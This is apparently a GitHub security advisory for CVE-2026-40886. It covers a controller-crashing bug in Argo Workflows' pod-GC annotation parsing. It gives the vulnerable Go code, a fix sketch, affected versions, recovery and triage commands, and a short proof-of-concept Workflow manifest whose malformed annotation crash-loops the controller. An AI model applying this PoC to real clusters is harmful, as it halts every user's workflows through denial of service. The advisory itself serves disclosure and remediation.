CVE-2026-40886

ADVISORY - github

Summary

An unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted.

Details

podGCFromPod() splits the annotation value on "/" and unconditionally accesses parts[1]:

func podGCFromPod(pod *apiv1.Pod) wfv1.PodGC {
    if val, ok := pod.Annotations[common.AnnotationKeyPodGCStrategy]; ok {
        parts := strings.Split(val, "/")
        return wfv1.PodGC{Strategy: wfv1.PodGCStrategy(parts[0]), DeleteDelayDuration: parts[1]}
    }
    return wfv1.PodGC{Strategy: wfv1.PodGCOnPodNone}
}

If the annotation value contains no "/", parts has length 1 and parts[1] panics with index out of range.
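
The guard that avoids the panic can be sketched as follows. `parsePodGCAnnotation` is a hypothetical, self-contained stand-in for the parsing step (the real fix would live inside `podGCFromPod` and return a `wfv1.PodGC`); it illustrates bounding the split and checking the part count before indexing:

```go
package main

import (
	"fmt"
	"strings"
)

// parsePodGCAnnotation is a hypothetical stand-in for the vulnerable parsing
// step. SplitN caps the result at two parts, and the delay is only read when
// the separator was actually present, so a value like "NoSlash" cannot panic.
func parsePodGCAnnotation(val string) (strategy, delay string) {
	parts := strings.SplitN(val, "/", 2)
	strategy = parts[0]
	if len(parts) == 2 {
		delay = parts[1]
	}
	return strategy, delay
}

func main() {
	fmt.Println(parsePodGCAnnotation("OnPodCompletion/30s")) // strategy and delay
	fmt.Println(parsePodGCAnnotation("NoSlash"))             // strategy only, empty delay
}
```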

The code was introduced in #14129 and affects versions:

  • 3.6.x: v3.6.5 through v3.6.19 (backport in #14263)
  • 3.7.x: v3.7.0-rc1 through v3.7.12
  • 4.x: v4.0.0-rc1 through v4.0.3
  • Not affected: v3.6.4 and earlier

PoC

Apply this workflow to a cluster running the Argo Workflows controller:

kubectl apply -n argo -f - <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: crash-podgc
spec:
  entrypoint: main
  serviceAccountName: default
  podGC:
    strategy: OnPodCompletion
  podMetadata:
    annotations:
      workflows.argoproj.io/pod-gc-strategy: "NoSlash"
  templates:
    - name: main
      container:
        image: alpine:3.18
        command: [echo, "hello"]
EOF

Within seconds, the controller crashes and the controller pod shows CrashLoopBackOff with an increasing restart count. The controller logs show:

panic: runtime error: index out of range [1] with length 1

goroutine 291 [running]:
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.podGCFromPod(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:176
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).commonPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:197
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).addPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:246

Recovery requires deleting the poisoned workflow:

kubectl delete workflow -n argo crash-podgc
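
If pods linger after the workflow is deleted, or the offending workflow is not obvious, a triage query like the following can list pods carrying a separator-less annotation value. This is an illustrative sketch, not part of the advisory; it assumes kubectl and jq are available:

```shell
# List pods (all namespaces) whose pod-gc-strategy annotation lacks the
# "/" separator -- these are the values that trigger the panic.
kubectl get pods -A -o json | jq -r '
  .items[]
  | select((.metadata.annotations["workflows.argoproj.io/pod-gc-strategy"] // "")
           | (. != "" and (contains("/") | not)))
  | "\(.metadata.namespace)/\(.metadata.name)"'
```

Each matching pod is printed as `namespace/name`, ready to pass to `kubectl delete pod`.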

Impact

Any user who can submit workflows can crash the Argo Workflows controller and keep it down indefinitely. This is a denial-of-service against all workflows in the cluster. No workflows can make progress while the controller is crash-looping. The attacker needs only create permission on Workflow resources, which is the baseline permission for any Argo Workflows user.

Common Weakness Enumeration (CWE)

NIST and GitHub: Improper Validation of Array Index (CWE-129)

